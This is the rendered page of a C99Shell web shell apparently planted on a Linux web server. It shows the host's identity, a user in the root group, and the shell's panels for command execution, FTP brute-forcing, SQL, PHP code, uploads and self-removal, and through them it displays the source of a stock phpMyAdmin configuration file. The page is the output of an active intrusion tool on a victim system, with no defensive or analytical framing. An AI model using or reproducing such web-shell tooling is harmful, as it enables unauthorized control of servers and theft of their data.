!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/public_html/phpmyadmin/   drwxr-xr-x
Free 28.54 GB of 117.98 GB (24.19%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     show_config_errors.php (1.13 KB)      -rwxr-x---
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
 * Simple wrapper just to enable error reporting and include config
 */

declare(strict_types=1);

if (! 
defined('ROOT_PATH')) {
    
// phpcs:disable PSR1.Files.SideEffects
    
define('ROOT_PATH'__DIR__ DIRECTORY_SEPARATOR);
    
// phpcs:enable
}

// rfc2616 - Section 14.21
header('Expires: ' gmdate(DATE_RFC1123));
// HTTP/1.1
header('Cache-Control: no-store, no-cache, must-revalidate,  pre-check=0, post-check=0, max-age=0');

header('Pragma: no-cache'); // HTTP/1.0
// test case: exporting a database into a .gz file with Safari
// would produce files not having the current time
// (added this header for Safari but should not harm other browsers)
header('Last-Modified: ' gmdate(DATE_RFC1123));

header('Content-Type: text/html; charset=utf-8');

// phpcs:disable PSR1.Files.SideEffects
define('PHPMYADMIN'true);
// phpcs:enable

require ROOT_PATH 'libraries/constants.php';

// issue #16256 - This only works with php 8.0+
if (function_exists('error_reporting')) {
    
error_reporting(E_ALL);
}

/**
 * Read config file.
 */
if (is_readable(CONFIG_FILE)) {
    
/** @psalm-suppress MissingFile */
    
include CONFIG_FILE;
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0037 ]--